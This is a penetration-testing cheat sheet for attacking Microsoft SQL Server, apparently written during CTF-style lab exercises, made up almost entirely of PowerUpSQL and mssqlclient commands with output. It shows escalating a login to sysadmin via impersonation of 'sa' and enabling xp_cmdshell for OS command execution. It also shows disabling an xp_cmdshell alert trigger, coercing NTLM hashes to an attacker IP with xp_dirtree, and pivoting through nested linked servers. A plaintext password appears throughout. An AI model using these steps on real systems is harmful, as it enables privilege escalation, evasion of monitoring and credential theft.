MSSQL
PowerUpSQL.ps1
#Audit
Invoke-SQLAudit -Instance ZPH-SVRSQL01 -username zabbix -p 'rDhHbBEfh35sMbkY'
#Add user to sysadmin group
Get-SQLQuery -Instance ZPH-SVRSQL01 -Query "EXECUTE AS LOGIN = 'sa'; EXEC SP_ADDSRVROLEMEMBER 'zabbix', 'sysadmin'" -username zabbix -p 'rDhHbBEfh35sMbkY' -verboseto enableXP_cmdshell
#check xp_cmdshell is enable or not
Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "SELECT value, value_in_use FROM sys.configurations WHERE name='xp_cmdshell';" -username zabbix -p 'rDhHbBEfh35sMbkY' -verbose
#Enable advanced options:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "EXEC sp_configure 'show advanced options',1" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.
#Apply configuration changes:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "RECONFIGURE" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.
#Enable xp_cmdshell:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "EXEC sp_configure 'xp_cmdshell',1" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.
#Apply configuration changes again:
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "RECONFIGURE" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.
#Execute system command (whoami):
*Evil-WinRM* PS C:\Users\jamie\Documents> Get-SQLQuery -Instance ZPH-SVRSQL01.zsm.local -Query "EXEC master..xp_cmdshell 'whoami'" -username zabbix -password rDhHbBEfh35sMbkY -Verbose
Verbose: ZPH-SVRSQL01.zsm.local : Connection Success.
output
------
nt service\mssqlserver
*Evil-WinRM* PS C:\Users\jamie\Documents> \/h1Linked Server
Get-SQLQuery -Instance ZPH-SVRSQL01 -Query "EXEC sp_linkedservers;" -username zabbix -p 'rDhHbBEfh35sMbkY' -VerboseMSSQL Client
via mssqlclient cheatsheet
# to get version
select @@version;
# to get current server
select @@servername
#current user
select suser_name();
#To List Users
SELECT name FROM master..syslogins
#To List sysadmin privs for all users
SELECT name,sysadmin FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';
#List database
SELECT name FROM master..sysdatabases;
#to check or permission
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
#List table and schema
select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;
#To query a different DB in MSSQL, it’s [server].[db].[schema].[table]
#to list triggers and disable trigger
select name from sys.server_triggers;
disable trigger ALERT_xp_cmdshell on all server
#If xp_dirtree is enable, we try to catch NTLM hashes via responder
xp_dirtree \\10.10.16.7\testDatabase Link
#List the database links
select * from master..sysservers
#enum links
enum_links
#use Link
use_link [DC02.darkzero.ext];
#List server name
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@servername');
#List Version
select * from openquery("COMPATIBILITY\POO_CONFIG", 'select @@version');
#List sysadmin
select * from openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name,sysadmin FROM master..syslogins');
#List Databases
select * from openquery("WEB\CLIENTS", 'SELECT name FROM master..sysdatabases;');
#List tables
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT * FROM clients.information_schema.tables');
nested database links
#try to have POO_CONFIG run a command on POO_PUBLIC
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''select suser_name();'')')
#To check for permission
select * from openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC",''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'')')
#xp_cmdshell via EXECUTE
EXECUTE('EXECUTE(''xp_cmdshell whoami'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]Procdure
#List Procedure
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, object_id FROM clients.sys.procedures');
#To check the permission on that Procedure (1 yes/ 0 no)
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT HAS_PERMS_BY_NAME(''clients.dbo.BackupClients'', ''OBJECT'', ''VIEW DEFINITION'') AS CanViewDefinition');
#To check the encryption of procedure
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT OBJECT_NAME(object_id) AS ProcName, OBJECT_DEFINITION(object_id) AS Definition FROM clients.sys.procedures WHERE name = ''BackupClients''');
#to check for assembly files
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, assembly_id, clr_name, permission_set_desc, is_visible FROM clients.sys.assemblies');
Last updated